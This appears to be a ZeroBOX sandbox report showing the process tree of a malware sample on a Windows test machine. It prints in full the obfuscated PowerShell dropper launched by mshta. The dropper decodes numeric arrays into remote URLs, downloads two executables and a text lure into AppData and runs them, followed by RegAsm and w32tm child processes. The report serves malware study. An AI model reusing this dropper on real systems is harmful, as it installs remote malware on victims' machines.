| ZeroBOX

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\name.hta
2564
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function MnCAu($JwXKrhDlRivPRs, $CSqvRkWsqkA){[IO.File]::WriteAllBytes($JwXKrhDlRivPRs, $CSqvRkWsqkA)};function XszcGdVlHyMMWW($JwXKrhDlRivPRs){if($JwXKrhDlRivPRs.EndsWith((ZSExtBzusbrVsk @(76638,76692,76700,76700))) -eq $True){Start-Process (ZSExtBzusbrVsk @(76706,76709,76702,76692,76700,76700,76643,76642,76638,76693,76712,76693)) $JwXKrhDlRivPRs}else{Start-Process $JwXKrhDlRivPRs}};function QXRFnJUoDIK($EZeJuqGUYsRSuxjBdAY){$lklkVjgHYMCkOvnobVk = New-Object (ZSExtBzusbrVsk @(76670,76693,76708,76638,76679,76693,76690,76659,76700,76697,76693,76702,76708));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$CSqvRkWsqkA = $lklkVjgHYMCkOvnobVk.DownloadData($EZeJuqGUYsRSuxjBdAY);return $CSqvRkWsqkA};function ZSExtBzusbrVsk($ylkB){$TsyEWI=76592;$EIrofWZToIZNi=$Null;foreach($hHVHDWGIHgsCmBjRs in $ylkB){$EIrofWZToIZNi+=[char]($hHVHDWGIHgsCmBjRs-$TsyEWI)};return $EIrofWZToIZNi};function XeKyUELvjZOVnMLkCD(){$txkviPAwby = $env:AppData + '\';$eZbyJ = $txkviPAwby + 'host1.exe'; if (Test-Path -Path $eZbyJ){XszcGdVlHyMMWW $eZbyJ;}Else{ $mEkrPEVUnvHtBs = QXRFnJUoDIK (ZSExtBzusbrVsk @(76696,76708,76708,76704,76650,76639,76639,76644,76645,76638,76646,76647,76638,76642,76642,76648,76638,76644,76648,76639,76696,76703,76707,76708,76641,76638,76693,76712,76693));MnCAu $eZbyJ $mEkrPEVUnvHtBs;XszcGdVlHyMMWW $eZbyJ;}$PXnzJ = $txkviPAwby + 'system32.exe'; if (Test-Path -Path $PXnzJ){XszcGdVlHyMMWW $PXnzJ;}Else{ $gpdHJmGBeHRamC = QXRFnJUoDIK (ZSExtBzusbrVsk @(76696,76708,76708,76704,76650,76639,76639,76644,76645,76638,76646,76647,76638,76642,76642,76648,76638,76644,76648,76639,76707,76713,76707,76708,76693,76701,76643,76642,76638,76693,76712,76693));MnCAu $PXnzJ $gpdHJmGBeHRamC;XszcGdVlHyMMWW $PXnzJ;};$oaxCdtTRdtQjSGzhkBM = $txkviPAwby + '123.txt';If(Test-Path -Path $oaxCdtTRdtQjSGzhkBM){Invoke-Item $oaxCdtTRdtQjSGzhkBM;}Else{ $OcHRVIXAgnJxIm = QXRFnJUoDIK (ZSExtBzusbrVsk @(76696,76708,76708,76704,76650,76639,76639,76644,76645,76638,76646,76647,76638,76642,76642,76648,76638,76644,76648,76639,76641,76642,76643,76638,76708,76712,76708));MnCAu $oaxCdtTRdtQjSGzhkBM $OcHRVIXAgnJxIm;Invoke-Item $oaxCdtTRdtQjSGzhkBM;};;;;}XeKyUELvjZOVnMLkCD;" uac
  2688
  - host1.exe "C:\Users\test22\AppData\Roaming\host1.exe"
    2936
    - RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      196
      - cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\I8Z7Joxb0y.bat" "
        1864
        
        w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        2292
        
        w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        3008
  - system32.exe "C:\Users\test22\AppData\Roaming\system32.exe"
    2996
    - system32.exe "C:\Users\test22\AppData\Roaming\system32.exe"
      2580
  - notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\test22\AppData\Roaming\123.txt
    3060

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents